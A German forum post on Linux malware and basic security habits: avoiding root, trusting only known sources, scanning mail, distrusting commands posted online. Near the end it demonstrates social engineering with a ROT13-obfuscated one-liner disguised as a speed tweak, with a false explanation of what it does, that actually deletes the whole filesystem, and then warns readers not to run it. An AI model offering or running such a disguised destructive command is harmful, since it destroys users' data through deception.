Siehe z.B. hier:
http://en.wikipedia.org/wiki/List_of_Linux_computer_viruses
http://www.wildlist.org/WildList
Auch bei $Suchmaschine mal eingeben:
"linux viren"
"linux viren liste"
wird dir (neben dem üblichen Müll) einige gute Beiträge für ein "Pro oder Contra" zeigen.
Fakt ist u.a.:
- Sich selbst reproduzierender Code ist unter Linux möglich.
- Es gibt Viren, wenn diese auch nicht im Umlauf sind.
- Viren z.B. für Windows können in Linux nicht aktiv werden, allenfalls in einer Emulation.
- Das Prinzip und die Anwendbarkeit einer Multi-Userumgebung ist bei Linux wesentlich besser durchdacht und anwendbar als z.B. bei Windows (v.a. im "Heim"-Bereich). Für Entwickler der Programme steht nicht Profitmaximierung im Vordergrund, v.a. nicht "auf Teufel komm raus" den Kunden an ein bestimmtes Programm/Produkt zu binden z.B. durch "Vereinfachung" auf Kosten der Sicherheit (Beispiel Outlook).
Es gibt IMHO ein paar einfache Verhaltensregeln, die einen permaneten (oft trügerischen)
Wächter im Hintergrund unötig machen:
- Arbeite nicht permanent als root ("Administrator"). Deshalb bin ich auch kein Freund dieser Methode Ubuntus: generelle Root-Rechte mittels passwortlosem sudo. Das hat mittlerweile jeder potentielle Schadcode-Programmierer mitgekriegt.
- Arbeite als root lediglich zur Aktualisierung/Installation von Software und zur Administration. Mache das bewußt, sei gegenwärtig in welcher Umgebung du momentan bist (offene root-Shell unter 100 Konsolenfenster) und verhalte dich so als würde Nachts um 03:00 jemand an deiner Tür klingeln.
- Installiere Software (oder kompiliere Code) nur aus/von Quellen, denen du vetraust. Wer sich eine Testversion (Binär oder Quellcode) von MySql 7.1 von einem Server aus Rumänien zieht ist selbst schuld.
Ich sehe eine größere Gefahr eher durch quelloffenen Code, der dadurch leicht
manipulierbar ist. Und wer keinen Code lesen kann/will hat evtl. ein Problem. Allerdings
ist die Quelloffenheit auch wieder die beste Gewähr, das Schadcode entdeckt werden
kann.
Ich persönlich scanne eingehende E-Mail (für meine Art zu arbeiten das evtl., Haupt-
Einfallstor) und alle Software, die ich von externen Quellen bekomme (Disketten, CD's,
Sticks). Weniger für meinen eigenen Schutz, eher um Bekannte evtl. gezielt aufmerksam
machen zu können. Mir langt dazu der Clamav, der auf meinem Server läuft.
Viel gefährlicher finde ich die sog. "soziale Infektion", also einen anderen dazu zu bringen
einen bestimmten Vorgang auszuführen (Foren, Wiki's, IRC). Man sollte nicht blindlings
alles tun, auch wenn die eigene Kenntniss zur Beurteilung nicht ausreicht. Jeden Befehl
erstaml z.B. die man page anschauen um wenigstens eine Vorstellung zu bekommen,
was das macht. Und dabei etwas vom System zu lernen.
Beispiel: Hier das ultimative Skript, um z.B. Openoffice-Dokumente und die Anwendungen
ca. 50% schneller starten zu lassen:
echo "ez -e -s /" | tr A-Za-z N-ZA-Mn-za-m | sh
Hier wird mittels des Tools ez (executable zip) die durch tr (test run) gefundenen
Anwendungen für die ab Kernel 2.6. vorhandene Speicher-Komprimierung vorbereitet.
Das muß als root ausgeführt werden.
So: Das bitte nicht ausführen!!! Das löscht alle Dateien in allen Verzeichnissen.
Das nur ein Beispiel, warum man sich ein Stück gesunden Menschenverstand bewahren
sollte.